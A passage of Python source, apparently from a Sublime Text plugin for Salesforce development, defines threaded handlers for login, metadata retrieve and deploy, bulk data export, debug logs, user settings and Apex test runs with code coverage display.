ThreadProgress(api, thread, "Downloading Users List", "Succeed to download users list")
def populate_sobject_recordtypes():
"""
Get dict ([sobject, recordtype name] => recordtype id) in whole org
@return: {
username , "sobject_recordtypes": {
sobject + rtname: rtid
}
...
}
"""
# Get settings
settings = context.get_settings()
# If sobjects is exist in `/.config/recordtype.json`, just return it
recordtype_path = settings["workspace"]+"/.config/recordtype.json"
if os.path.isfile(recordtype_path):
recordtype = json.loads(open(recordtype_path).read())
return recordtype
# If sobjects is not exist in globals(), post request to pouplate it
api = ToolingApi(settings)
query = "SELECT Id, Name, SobjectType FROM RecordType"
thread = threading.Thread(target=api.query_all, args=(query, ))
thread.start()
while thread.is_alive() or not api.result:
time.sleep(1)
# Exception Process
if not api.result["success"]:
Printer.get('error').write(message.SEPRATE.format(util.format_error_message(api.result)))
return
records = api.result["records"]
sobject_recordtypes = {}
for recordtype in records:
sobject_type = recordtype["SobjectType"]
recordtype_name = recordtype["Name"]
recordtype_id = recordtype["Id"]
sobject_recordtypes[sobject_type + ", " + recordtype_name] = recordtype_id
# Add Master of every sobject to List
sobjects_describe = util.populate_sobjects_describe()
for sobject_type in sobjects_describe:
sobject_describe = sobjects_describe[sobject_type]
if not sobject_describe["layoutable"]: continue
sobject_recordtypes[sobject_type + ", Master"] = "012000000000000AAA"
util.add_config_history("recordtype", sobject_recordtypes, settings)
return sobject_recordtypes
def handle_update_user_language(language, timeout=120):
settings = context.get_settings()
api = ToolingApi(settings)
session = util.get_session_info(settings)
if not session:
return Printer.get('error').write("Login is required before this action")
patch_url = "/sobjects/User/%s" % session["user_id"]
thread = threading.Thread(target=api.patch,
args=(patch_url, {"LanguageLocaleKey": language}, ))
thread.start()
ThreadProgress(api, thread, "Updating User Language to " + language,
"User language is updated to " + language)
def handle_enable_development_mode(user_id, timeout=120):
settings = context.get_settings()
api = ToolingApi(settings)
patch_url = "/sobjects/User/%s" % user_id
thread = threading.Thread(target=api.patch,
args=(patch_url, {"UserPreferencesApexPagesDeveloperMode": True}, ))
thread.start()
ThreadProgress(api, thread, "Enabling User Development Mode",
"Succeed to Enabling User Development Mode")
def handle_update_user_password(user_id, new_password, timeout=120):
settings = context.get_settings()
api = ToolingApi(settings)
thread = threading.Thread(target=api.manage_password, args=(
user_id, {"NewPassword": new_password},
))
thread.start()
masked_password = new_password[:5] + "*" * len(new_password[3:])
ThreadProgress(api, thread, "Updating User Password to " + masked_password,
"Succeed to update user password to " + masked_password)
def handle_login_thread(callback_options={}, force=False, timeout=120):
def handle_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda: handle_thread(thread, timeout), timeout)
return
result = api.result
if result and result["success"]:
if "callback_command" in callback_options:
callback_command = callback_options["callback_command"]
args = callback_options["args"] if "args" in callback_options else {}
sublime.active_window().run_command(callback_command, args)
settings = context.get_settings()
api = ToolingApi(settings)
thread = threading.Thread(target=api.login, args=(force, ))
thread.start()
handle_thread(thread, timeout)
default_project_name = settings["default_project_name"]
ThreadProgress(api, thread, "Login to %s" % default_project_name,
default_project_name + " Login Succeed")
def handle_view_code_coverage(component_name, component_id, body, timeout=120):
def handle_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda: handle_thread(thread, timeout), timeout)
return
result = api.result
if not result["success"]:
return
if result["totalSize"] == 0:
Printer.get("log").write("There is no available code coverage")
return
# Populate the coverage info from server
uncovered_lines = result["records"][0]["Coverage"]["uncoveredLines"]
covered_lines = result["records"][0]["Coverage"]["coveredLines"]
covered_lines_count = len(covered_lines)
uncovered_lines_count = len(uncovered_lines)
total_lines_count = covered_lines_count + uncovered_lines_count
if total_lines_count == 0:
Printer.get("log").write("There is no available code coverage")
return
coverage_percent = covered_lines_count / total_lines_count * 100
# Append coverage statistic info
coverage_statistic = "%s Coverage: %.2f%%(%s/%s)" % (
component_name, coverage_percent,
covered_lines_count, total_lines_count
)
# If has coverage, just add coverage info to new view
view = sublime.active_window().new_file()
view.run_command("new_view", {
"name": coverage_statistic,
"input": body
})
# Calculate line coverage
split_lines = view.lines(sublime.Region(0, view.size()))
uncovered_region = []
for region in split_lines:
# The first four Lines are the coverage info
line = view.rowcol(region.begin() + 1)[0] + 1
if line in uncovered_lines:
uncovered_region.append(region)
# Append body with uncovered line
view.add_regions("uncovered_lines", uncovered_region, "invalid", "dot",
sublime.DRAW_SOLID_UNDERLINE | sublime.DRAW_EMPTY_AS_OVERWRITE)
settings = context.get_settings()
api = ToolingApi(settings)
query = "SELECT Coverage FROM ApexCodeCoverageAggregate " +\
"WHERE ApexClassOrTriggerId = '{0}'".format(component_id)
thread = threading.Thread(target=api.query, args=(query, True, ))
thread.start()
ThreadProgress(api, thread, "View Code Coverage of " + component_name,
"View Code Coverage of " + component_name + " Succeed")
handle_thread(thread, timeout)
def handle_refresh_folder(types, ignore_package_xml=True, timeout=120):
def handle_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda:handle_thread(thread, timeout), timeout)
return
# Not succeed
if not api.result or not api.result["success"]: return
# Get refresh result
result = api.result
# Populate extract_to directory
extract_to = settings["workspace"]
# Extract zip, True means not override package.xml
thread = threading.Thread(target=util.extract_encoded_zipfile,
args=(result["zipFile"], extract_to, ignore_package_xml, ))
thread.start()
util.reload_file_attributes(result["fileProperties"], settings)
# Hide panel 0.5 seconds later
sublime.set_timeout_async(Printer.get("log").hide_panel, 500)
# Start to request
settings = context.get_settings()
api = MetadataApi(settings)
thread = threading.Thread(target=api.retrieve, args=({"types": types}, ))
thread.start()
handle_thread(thread, timeout)
message = "Refresh Folder"
ThreadProgress(api, thread, message, message+" Succeed")
def handle_reload_symbol_tables(timeout=120):
"""
Reload Symbol Tables to Local Cache
"""
def handle_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda: handle_thread(thread, timeout), timeout)
return
result = api.result
if not result["success"]: return
# Get the username of default project
username = settings["username"]
# Save symbolTable to component_metadata.sublime-settings
symbol_table_cache = sublime.load_settings("symbol_table.sublime-settings")
symboltable_dict = symbol_table_cache.get(username, {})
for record in result["records"]:
# Sometimes symbolTable is null, just skip
if not record["SymbolTable"]: continue
# Outer completions
outer = util.parse_symbol_table(record["SymbolTable"])
symboltable_dict[record["Name"].lower()] = {
"outer" : outer,
"name": record["Name"]
}
# Inner completions
inners = {}
for inn in record["SymbolTable"]["innerClasses"]:
inner = util.parse_symbol_table(inn)
inners[inn["name"].lower()] = inner
symboltable_dict[record["Name"].lower()]["inners"] = inners
symbol_table_cache.set(settings["username"], symboltable_dict)
sublime.save_settings("symbol_table.sublime-settings")
settings = context.get_settings()
api = ToolingApi(settings)
thread = threading.Thread(target=api.query_symbol_table, args=(30, ))
thread.start()
wating_message = "Reloading Symbol Tables"
ThreadProgress(api, thread, wating_message, wating_message + " Succeed")
handle_thread(thread, timeout)
def handle_reload_sobjects_completions(timeout=120):
"""
Save sobject describe to local which is used in completions
"""
def handle_threads(apis, threads, timeout):
for thread in threads:
if thread.is_alive():
sublime.set_timeout(lambda: handle_threads(apis, threads, timeout), timeout)
return
# If succeed, get the all sobject describe result
results = []
for api in apis:
results.extend(api.result)
# Save all sobject describe result to sublime settings
s = sublime.load_settings("sobjects_completion.sublime-settings")
sobjects_completion = {"sobjects": {}}
all_parent_relationship_dict = {}
all_child_relationship_dict = {}
for sobject_describe in results:
# Initiate Sobject completions
if "name" not in sobject_describe:
continue
sobject_name = sobject_describe["name"]
# If sobject is excluded sobject, just continue
sobject_name = sobject_name.lower()
sobjects_completion["sobjects"][sobject_name] = {
"name": sobject_describe["name"],
"keyPrefix": sobject_describe["keyPrefix"],
"layoutable": sobject_describe["layoutable"],
"triggerable": sobject_describe["triggerable"]
}
# Combine Fields dict, Picklist Field dict and parent relationship dict
fields_dict = {}
picklist_field_dict = {}
parent_relationship_dict = {}
child_relationship_dict = {}
for f in sobject_describe["fields"]:
field_name = f["name"]
precision = f["precision"]
scale = f["scale"]
field_type = f["type"]
referenceTo = f["referenceTo"] if "referenceTo" in f else []
if f["calculatedFormula"]:
capitalize_field = field_type.capitalize()
field_desc_dict = {
"double": "Formula(%s, %s, %s)" % (capitalize_field, precision, scale),
"currency": "Formula(%s, %s, %s)" % (capitalize_field, precision, scale),
"date": "Formula(Date)",
"datetime": "Formula(Datetime)",
"boolean": "Formula(Boolean)",
"int": "Formula(Integer)",
"reference": ("Reference(%s)" % ",".join(referenceTo)) if referenceTo else "Reference",
"other": "Formula(%s, %s)" % (capitalize_field, f["length"])
}
else:
field_desc_dict = {
"double": "Double(%s, %s)" % (precision, scale),
"currency": "Currency(%s, %s)" % (precision, scale),
"date": "Date",
"datetime": "Datetime",
"boolean": "Boolean",
"reference": ("Reference(%s)" % ",".join(referenceTo)) if referenceTo else "Reference",
"int": "Integer",
"other": "%s(%s)" % (field_type.capitalize(), f["length"])
}
# External Or not
externalUniqueNotation = ""
if f["externalId"] or f["unique"]:
externalUniqueNotation = "[%s%s%s] " % (
"E" if f["externalId"] else "",
"U" if f["unique"] else "",
"R" if not f["nillable"] else ""
)
# If display_field_name_and_label setting is true,
# display both field name and field label
field_name_desc = "%s(%s)" % (field_name, f["label"]) \
if settings["display_field_name_and_label"] else field_name
# Display field type with specified format
field_type_desc = field_desc_dict[field_type] if field_type \
in field_desc_dict else field_desc_dict["other"]
fd = "%s%s\t%s" % (externalUniqueNotation, field_name_desc, field_type_desc)
fields_dict[fd] = field_name
# Picklist Dcit
if f["type"] == "picklist":
picklists = []
for picklistValue in f["picklistValues"]:
picklists.append({
"label": picklistValue["label"],
"value": picklistValue["value"]
})
picklist_field_dict[field_name] = picklists
# List all Reference Field Relationship Name as fields
# Some fields has two more references, we can't list the fields of it
if not len(f["referenceTo"]) == 1: continue
parentRelationshipName = f["relationshipName"]
if not parentRelationshipName: continue
parentSobject = f["referenceTo"][0]
if parentRelationshipName in all_parent_relationship_dict:
is_duplicate = False
for so in all_parent_relationship_dict[parentRelationshipName]:
if parentSobject == so:
is_duplicate = True
break
if not is_duplicate:
all_parent_relationship_dict[parentRelationshipName].append(parentSobject)
else:
all_parent_relationship_dict[parentRelationshipName] = [parentSobject]
# Add Parent Relationship Name
parent_relationship_dict[f["relationshipName"]] = parentSobject
# Child Relationship dict
for f in sobject_describe["childRelationships"]:
childRelationshipName = f["relationshipName"]
childSobject = f["childSObject"]
if not childRelationshipName: continue
# Add Parent Relationship Name as Field
child_relationship_dict[childRelationshipName] = childSobject
# Combine sobject fields dict and sobject child relationship dict
sobjects_completion["sobjects"][sobject_name]["fields"] = fields_dict
sobjects_completion["sobjects"][sobject_name]["picklist_fields"] = picklist_field_dict
sobjects_completion["sobjects"][sobject_name]["parentRelationships"] = parent_relationship_dict
sobjects_completion["sobjects"][sobject_name]["childRelationships"] = child_relationship_dict
# Populate Child Relationship and Parent Relationship
sobjects_completion["parentRelationships"] = all_parent_relationship_dict
# sobjects_completion["childRelationships"] = all_child_relationship_dict
# Every project has unique username
username = settings["username"]
s.set(username, sobjects_completion)
# Save settings
sublime.save_settings("sobjects_completion.sublime-settings")
# Reload cache for completions
from . import completions
sublime.set_timeout(lambda:completions.load_sobject_cache(
True, username
), 5)
def handle_thread(api, thread, timeout=120):
if thread.is_alive():
sublime.set_timeout(lambda:handle_thread(api, thread, timeout), timeout)
return
# Exception Process
if not api.result or not api.result["success"]:
return
# Get describe result of all sObjects
sobjects_describe = api.result["sobjects"]
sobjects = list(sobjects_describe.keys())
mcc = settings["maximum_concurrent_connections"]
chunked_sobjects = util.list_chunks(sobjects, math.ceil(len(sobjects) / mcc))
threads = []
apis = []
for sobjects in chunked_sobjects:
api = ToolingApi(settings)
thread = threading.Thread(target=api.describe_sobjects, args=(sobjects, ))
thread.start()
threads.append(thread)
apis.append(api)
ThreadsProgress(threads, "Download Cache of Sobjects", "Download Cache of Sobjects Succeed")
handle_threads(apis, threads, 10)
settings = context.get_settings()
api = ToolingApi(settings)
thread = threading.Thread(target=api.get_sobjects, args=())
thread.start()
ThreadProgress(api, thread, "Global Describe", "Global Describe Succeed")
handle_thread(api, thread, timeout)
def handle_destructive_files(dirs_or_files, ignore_folder=True, timeout=120):
def handle_thread(thread, timeout=120):
if thread.is_alive():
sublime.set_timeout(lambda:handle_thread(thread, timeout), timeout)
return
# After succeed, remove dirs_or_files and related *-meta.xml from local
if "body" in api.result and api.result["body"]["status"] == "Succeeded":
win = sublime.active_window()
for _file_or_dir in dirs_or_files:
# Remove file from local disk and close the related view
view = util.get_view_by_file_name(_file_or_dir)
if view:
win.focus_view(view)
win.run_command("close")
if os.path.isfile(_file_or_dir):
os.remove(_file_or_dir)
else:
shutil.rmtree(_file_or_dir)
# Remove related *-meta.xml file from local disk and close the related view
if ignore_folder and os.path.isfile(_file_or_dir+"-meta.xml"):
view = util.get_view_by_file_name(_file_or_dir+"-meta.xml")
if view:
win.focus_view(view)
win.run_command("close")
os.remove(_file_or_dir+"-meta.xml")
settings = context.get_settings()
api = MetadataApi(settings)
base64_encoded_zip = util.build_destructive_package_by_files(dirs_or_files, ignore_folder)
thread = threading.Thread(target=api.deploy, args=(base64_encoded_zip, ))
thread.start()
ThreadProgress(api, thread, "Destructing Files", "Destructing Files Succeed")
handle_thread(thread, timeout)
def handle_destructive_package_xml(types, timeout=120):
def handle_thread(thread, timeout=120):
if thread.is_alive():
sublime.set_timeout(lambda:handle_thread(thread, timeout), timeout)
return
settings = context.get_settings()
api = MetadataApi(settings)
base64_encoded_zip = util.build_destructive_package_by_package_xml(types)
thread = threading.Thread(target=api.deploy, args=(base64_encoded_zip, ))
thread.start()
ThreadProgress(api, thread, "Destructing Package.xml", "Destructing Package.xml Succeed")
handle_thread(thread, timeout)
def handle_deploy_thread(base64_encoded_zip,
source_org=None, element=None, chosen_classes=[], timeout=120, update_meta=False):
def handle_thread(thread, timeout=120):
if thread.is_alive():
sublime.set_timeout(lambda:handle_thread(thread, timeout), timeout)
return
# If source_org is not None, we need to switch project back
if settings["switch_back_after_migration"] and source_org:
util.switch_project(source_org)
result = api.result
body = result["body"]
if body["status"] == "Succeeded" and update_meta:
handle_update_aura_meta(body, element)
settings = context.get_settings()
api = MetadataApi(settings)
thread = threading.Thread(target=api.deploy, args=(
base64_encoded_zip,
chosen_classes,
))
thread.start()
ThreadProgress(api, thread, "Deploy Metadata to %s" % settings["default_project_name"],
"Metadata Deployment Finished")
handle_thread(thread, timeout)
def handle_update_aura_meta(body, element, timeout=120, type = "AuraDefinitionBundle"):
"""
:param body: body data returned from SOAP API
:param element: Aura type in `COMPONENT`, `CONTROLLER`, `HELPER`, `SVG`...
:param timeout: timeout in second
:param type: type
:return:
"""
def handle_thread(thread, full_name, timeout):
if thread.is_alive():
sublime.set_timeout(lambda: handle_thread(thread, full_name, timeout), timeout)
return
result = api.result
if not result or not result["success"]:
return
if result["totalSize"] == 0:
Printer.get("log").write("There is no component data")
return
elif result["totalSize"] == 1:
record = result["records"][0]
cmp_meta = {
"name": full_name[:full_name.find('.')],
"extension": full_name[full_name.find('.'):],
"id": record["Id"],
"lastModifiedDate": record["LastModifiedDate"],
"type": "AuraDefinitionBundle",
"DefType": record["DefType"]
}
components_dict[type][full_name.lower()] = cmp_meta
s.set(username, components_dict)
sublime.save_settings(context.COMPONENT_METADATA_SETTINGS)
# Refresh metadata settings
sublime.set_timeout(lambda: util.load_metadata_cache(True, settings["username"]), 5)
settings = context.get_settings()
username = settings["username"]
s = sublime.load_settings(context.COMPONENT_METADATA_SETTINGS)
if not s.has(username):
return
component_successes = body["details"]["componentSuccesses"]
if isinstance(component_successes, dict):
component_successes = [component_successes]
for item in component_successes:
if item["componentType"] == "AuraDefinitionBundle":
base_name = item["fullName"]
full_name = base_name + context.EXT_DICT.get(element.lower())
components_dict = s.get(username, {})
# Prevent exception if no component in org
if type not in components_dict:
components_dict = {type: {}}
# Build components dict
api = ToolingApi(settings)
query_str = "SELECT Id, DefType, LastModifiedDate, LastModifiedById " +\
"FROM AuraDefinition WHERE AuraDefinitionBundleId = '%s' and DefType = '%s'" % (
item['id'], element.upper())
thread = threading.Thread(target=api.query, args=(query_str,))
thread.start()
ThreadProgress(api, thread, "Update Component Metadata", "Update Component Metadata Finished")
handle_thread(thread, full_name, timeout)
break
def handle_track_all_debug_logs_thread(users, timeout=120):
settings = context.get_settings()
api = ToolingApi(settings)
# Divide users into pieces of dict
pieces = []
maximum_concurrent_connections = settings["maximum_concurrent_connections"]
split = math.ceil(len(users) / maximum_concurrent_connections)
for item in util.dict_chunks(users, split):
pieces.append(item)
threads = []
for users in pieces:
api = ToolingApi(settings)
thread = threading.Thread(target=api.create_trace_flags, args=(users, ))
thread.start()
threads.append(thread)
ThreadsProgress(threads, "Creating Trace Flags", "Creating Trace Flags Finished")
def handle_cancel_deployment_thread(async_process_id, timeout=120):
settings = context.get_settings()
api = MetadataApi(settings)
thread = threading.Thread(target=api._invoke_method, args=(
"cancelDeploy", {
"async_process_id": async_process_id,
}
))
thread.start()
ThreadProgress(api, thread, "Canceling Deploy", "Canceling Deploy Succeed")
def handle_close_jobs_thread(job_ids, timeout=120):
settings = context.get_settings()
bulkjob = BulkJob(settings, None, None)
for job_id in job_ids:
thread = threading.Thread(target=bulkjob.close_job, args=(job_id,))
thread.start()
def handle_bulk_operation_thread(sobject, inputfile, operation, timeout=120):
settings = context.get_settings()
bulkapi = BulkApi(settings, sobject, inputfile)
if operation == "insert":
target = bulkapi.insert
elif operation == "update":
target = bulkapi.update
elif operation == "upsert":
target = bulkapi.upsert
elif operation == "delete":
target = bulkapi.delete
thread = threading.Thread(target=target, args=())
thread.start()
progress_message = operation + " " + sobject
ThreadProgress(bulkapi, thread, progress_message, progress_message + " Succeed")
def handle_backup_sobject_thread(sobject, soql=None, timeout=120):
settings = context.get_settings()
bulkapi = BulkApi(settings, sobject, soql)
thread = threading.Thread(target=bulkapi.query, args=())
thread.start()
wait_message = "Export Records of " + sobject
ThreadProgress(bulkapi, thread, wait_message, wait_message + " Succeed")
def handle_backup_all_sobjects_thread(timeout=120):
def handle_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda:handle_thread(thread, timeout), timeout)
return
result = api.result
if not result or not result["success"]: return
threads = []
for sobject_describe in api.result["sobjects"]:
if "name" not in sobject_describe: continue
bulkapi = BulkApi(settings, sobject_describe["name"])
thread = threading.Thread(target=bulkapi.query, args=())
thread.start()
threads.append(thread)
wait_message = "Export All Sobjects Records"
ThreadsProgress(threads, wait_message, wait_message + " Succeed")
settings = context.get_settings()
api = ToolingApi(settings)
thread = threading.Thread(target=api.describe_global, args=())
thread.start()
ThreadProgress(api, thread, "Describe Global", "Describe Global Succeed")
handle_thread(thread, timeout)
def handle_export_workflows(settings, timeout=120):
def handle_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda: handle_thread(thread, timeout), timeout)
return
# If succeed
sObjects = []
for sd in api.result["sobjects"]:
if "name" not in sd: continue
sObjects.append(sd["name"])
util.parse_workflow_metadata(settings, sObjects)
sublime.active_window().run_command("refresh_folder_list")
outputdir = settings["workspace"] + "/workflow/"
api = ToolingApi(settings)
thread = threading.Thread(target=api.describe_global, args=())
thread.start()
ThreadProgress(api, thread, "Export All Workflows", "Outputdir: " + outputdir)
handle_thread(thread, 10)
def handle_export_validation_rules(settings, timeout=120):
def handle_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda: handle_thread(thread, timeout), timeout)
return
# If succeed
sObjects = []
for sd in api.result["sobjects"]:
if "name" not in sd: continue
sObjects.append(sd["name"])
util.parse_validation_rule(settings, sObjects)
sublime.active_window().run_command("refresh_folder_list")
api = ToolingApi(settings)
thread = threading.Thread(target=api.describe_global, args=())
thread.start()
ThreadProgress(api, thread, "Export All Validation Rules", "Validation Rules Export Succeed")
handle_thread(thread, 10)
def handle_export_customfield(timeout=120):
def handle_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda: handle_thread(thread, timeout), timeout)
return
# If succeed
result = api.result
if not result or not result["success"]: return
# Write list to csv
outputdir = os.path.join(settings["workspace"], ".export")
if not os.path.exists(outputdir): os.makedirs(outputdir)
records = sorted(result["records"], key=lambda k : k['TableEnumOrId'])
outputfile = os.path.join(outputdir, "CustomField.csv")
util.list2csv(outputfile, records)
# Open the csv file
view = sublime.active_window().open_file(outputfile)
settings = context.get_settings()
api = ToolingApi(settings)
query = "SELECT Id,TableEnumOrId,DeveloperName,NamespacePrefix FROM CustomField"
thread = threading.Thread(target=api.query, args=(query, True,))
thread.start()
ThreadProgress(api, thread, 'Exporting CustomFields', "Exporting CustomFields Succeed")
handle_thread(thread, 10)
def handle_export_role_hierarchy(timeout=120):
def handle_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda: handle_thread(thread, timeout), timeout)
return
# If succeed
result = api.result
if not result or not result["success"]: return
records = result["records"]
outputfile = util.export_role_hierarchy(records)
sublime.active_window().run_command("refresh_folder_list")
# Open file
view = sublime.active_window().open_file(outputfile)
settings = context.get_settings()
api = ToolingApi(settings)
soql = "SELECT Id, ParentRoleId, Name, " +\
"(SELECT Id, FirstName, LastName, Username FROM Users " +\
" WHERE IsActive = true AND Profile.UserLicense.Name = 'Salesforce') " +\
"FROM UserRole WHERE PortalType = 'None'"
thread = threading.Thread(target=api.query_all, args=(soql,))
thread.start()
ThreadProgress(api, thread, 'Exporting Role Hierarchy', "Role Hierarchy Exporting Succeed")
handle_thread(thread, 10)
def handle_export_data_template_thread(sobject, recordtype_name, recordtype_id, vertical, timeout=120):
def handle_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda: handle_thread(thread, timeout), timeout)
return
# If succeed
result = api.result
if not result or not result["success"]: return
# If outputdir is not exist, just make it
if not os.path.exists(outputdir): os.makedirs(outputdir)
# Write parsed result to csv
if vertical:
util.parse_data_template_vertical(output_file_dir, result)
else:
util.parse_data_template_horizontal(output_file_dir, result)
sublime.active_window().run_command("refresh_folder_list")
Printer.get("log").write("Data Template for %s: %s" % (sobject, output_file_dir))
settings = context.get_settings()
outputdir = settings["workspace"] + "/.export/layoutWorkbooks"
output_file_dir = "%s/%s-%s.csv" % (
outputdir, sobject, recordtype_name
)
api = ToolingApi(settings)
url = "/sobjects/%s/describe/layouts/%s" % (sobject, recordtype_id)
thread = threading.Thread(target=api.get, args=(url, ))
thread.start()
wait_message = "Export Data Template of %s=>%s" % (sobject, recordtype_name)
ThreadProgress(api, thread, wait_message, "Outputdir: " + output_file_dir)
handle_thread(thread, 120)
def handle_export_query_to_csv(tooling, soql, csv_name, data=None, timeout=120):
def handle_new_view_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda: handle_new_view_thread(thread, timeout), timeout)
return
result = api.result
if "success" in result and not result["success"]:
return
outputdir = os.path.join(settings["workspace"], ".export", "Query2CSV")
if not os.path.exists(outputdir): os.makedirs(outputdir)
time_stamp = time.strftime("%Y-%m-%d-%H-%M", time.localtime())
outputfile = os.path.join(outputdir, "%s.csv" % csv_name)
with open(outputfile, "wb") as fp:
fp.write(util.query_to_csv(result, soql))
view = sublime.active_window().open_file(outputfile)
settings = context.get_settings()
api = ToolingApi(settings)
thread = threading.Thread(target=api.query_all, args=(soql, tooling, ))
thread.start()
progress_message = "Export Query To %s.csv" % csv_name
ThreadProgress(api, thread, progress_message, progress_message + " Succeed")
handle_new_view_thread(thread, timeout)
def handle_execute_rest_test(operation, url, data=None, timeout=120):
def handle_new_view_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda: handle_new_view_thread(thread, timeout), timeout)
return
result = api.result
# If succeed
if "list" in result:
result = result["list"]
if "str" in result:
result = result["str"]
# If response result is just like '"{\\"name\\":\\"test\\"}"'
# we will remove the \\ and convert it to json automatically
if settings.get("remove_slash_for_rest_response", False):
try:
if "\\" in result:
result = result.replace("\\", "")
result = result[1:-1]
result = json.loads(result)
except:
pass
# Remove the useless success attribute
if isinstance(result, dict) and "success" in result:
del result["success"]
# No error, just display log in a new view
view = sublime.active_window().new_file()
view.set_syntax_file("Packages/JavaScript/JSON.tmLanguage")
time_stamp = time.strftime("%H:%M:%S", time.localtime(time.time()))
view.run_command("new_view", {
"name": "Rest %s-%s" % (operation, time_stamp),
"input": json.dumps(result, ensure_ascii=False, indent=4)
})
settings = context.get_settings()
api = ToolingApi(settings)
http_methods_target = {
"Get": api.get,
"Delete": api.delete,
"Head": api.head,
"Put": api.put,
"Post": api.post,
"Query": api.query,
"Tooling Query": api.query,
"Query All": api.query_all,
"Retrieve Body": api.retrieve_body,
"Patch": api.patch,
"Search": api.search,
"Quick Search": api.quick_search
}
target = http_methods_target[operation]
if operation in ['Put', 'Post', 'Patch']:
thread = threading.Thread(target=target, args=(url, data,))
elif operation == "Tooling Query":
thread = threading.Thread(target=target, args=(url, True))
else:
thread = threading.Thread(target=target, args=(url,))
thread.start()
progress_message = "Execute Rest %s Test" % operation
ThreadProgress(api, thread, progress_message, progress_message + " Succeed", show_error=False)
handle_new_view_thread(thread, timeout)
def handle_execute_query(soql, timeout=120):
def handle_new_view_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda: handle_new_view_thread(thread, timeout), timeout)
return
# If succeed
result = api.result
if not result["success"]: return
# No error, just display log in a new view
view = sublime.active_window().new_file()
view.run_command("new_view", {
"name": "Execute Query Result",
"input": json.dumps(result, indent=4)
})
# Keep the history in the local history rep
util.add_operation_history('execute_query', soql)
settings = context.get_settings()
api = ToolingApi(settings)
thread = threading.Thread(target=api.query, args=(soql,))
thread.start()
ThreadProgress(api, thread, "Execute Query", "Execute Query Succeed")
handle_new_view_thread(thread, timeout)
def handle_execute_anonymous(apex_string, timeout=120):
def handle_new_view_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda: handle_new_view_thread(thread, timeout), timeout)
return
# If succeed
result = api.result
if not result["success"]: return
if result["compiled"] == "false":
Printer.get('error').write(util.parse_execute_anonymous_xml(result))
else:
# No error, just display log in a new view
view = sublime.active_window().new_file()
view.run_command("new_view", {
"name": "Execute Anonymous Result",
"input": util.parse_execute_anonymous_xml(result)
})
view.settings().set("is_debug_log", True)
# Keep the history apex script to local
util.add_operation_history('execute_anonymous', apex_string)
settings = context.get_settings()
api = ApexApi(settings)
thread = threading.Thread(target=api.execute_anonymous, args=(apex_string, ))
thread.start()
ThreadProgress(api, thread, "Execute Anonymous", "Execute Anonymous Succeed")
handle_new_view_thread(thread, timeout)
def handle_fetch_debug_logs(user_full_name, user_id, timeout=120):
def handle_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda: handle_thread(thread, timeout), timeout)
return
result = api.result
if not result or "records" not in result:
return
records = result["records"]
debug_logs_table = util.format_debug_logs(settings, records)
Printer.get("log").write_start().write(debug_logs_table)
settings = context.get_settings()
api = ToolingApi(settings)
thread = threading.Thread(target=api.query_logs, args=(settings["last_n_logs"], user_id, ))
thread.start()
ThreadProgress(api, thread, "List Debug Logs for " + user_full_name,
"List Debug Logs for " + user_full_name + " Succeed")
handle_thread(thread, timeout)
def handle_create_debug_log(user_name, user_id, timeout=120):
def handle_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda: handle_thread(thread, timeout), timeout)
return
result = api.result
if not result["success"]: return
print (result)
settings = context.get_settings()
api = ToolingApi(settings)
thread = threading.Thread(target=api.create_trace_flag, args=(user_id, ))
thread.start()
ThreadProgress(api, thread, "Create Debug Log for " + user_name,
"Create Debug Log for " + user_name + " Succeed")
handle_thread(thread, timeout)
def handle_view_debug_log_detail(log_id, timeout=120):
def handle_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda: handle_thread(thread, timeout), timeout)
return
if not api.result["success"]: return
view = sublime.active_window().new_file()
view.run_command("new_view", {
"name": "Debug Log Detail",
"input": api.result["str"]
})
view.settings().set("is_debug_log", True)
settings = context.get_settings()
api = ToolingApi(settings)
url = "/sobjects/ApexLog/" + log_id + "/Body"
thread = threading.Thread(target=api.retrieve_body, args=(url, ))
thread.start()
ThreadProgress(api, thread, "Get Log Detail of " + log_id,
"Get Log Detail of " + log_id + " Succeed")
handle_thread(thread, timeout)
def handle_run_test(class_name, class_id, timeout=120):
def handle_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda: handle_thread(thread, timeout), timeout)
return
# If succeed
result = api.result
# If error
if "success" in result and not result["success"]: return
if not result:
return Printer.get("error").write("%s is not a test class" % class_name)
# No error, just display log in a new view
test_result = util.parse_test_result(result)
view = sublime.active_window().new_file()
view.settings().set("word_wrap", "false")
view.run_command("new_dynamic_view", {
"view_id": view.id(),
"view_name": "Test Result",
"input": test_result
})
# Keep the history in the local history rep
util.add_operation_history('Test/' + class_name, test_result)
# After run test succeed, get ApexCodeCoverageAggreate
query = "SELECT ApexClassOrTrigger.Name, NumLinesCovered, NumLinesUncovered, Coverage " +\
"FROM ApexCodeCoverageAggregate"
thread = threading.Thread(target=api.query, args=(query, True, ))
thread.start()
wait_message = "Get Code Coverage of " + class_name
ThreadProgress(api, thread, wait_message, wait_message + " Succeed")
handle_code_coverage_thread(thread, view, timeout)
def handle_code_coverage_thread(thread, view, timeout):
if thread.is_alive():
sublime.set_timeout(lambda: handle_code_coverage_thread(thread, view, timeout), timeout)
return
# If error, just skip
result = api.result
if "success" in result and not result["success"]: return
code_coverage = util.parse_code_coverage(result)
view.run_command("new_dynamic_view", {
"view_id": view.id(),
"view_name": "Test Result",
"input": code_coverage,
"point": view.size()
})
settings = context.get_settings()
api = ToolingApi(settings)
thread = threading.Thread(target=api.run_test, args=(class_id, ))
thread.start()
ThreadProgress(api, thread, "Run Test Class " + class_name, "Run Test for " + class_name + " Succeed")
handle_thread(thread, timeout)
def handle_run_sync_test(class_names, test_names, timeout=120):
def handle_thread(thread, timeout):
if thread.is_alive():
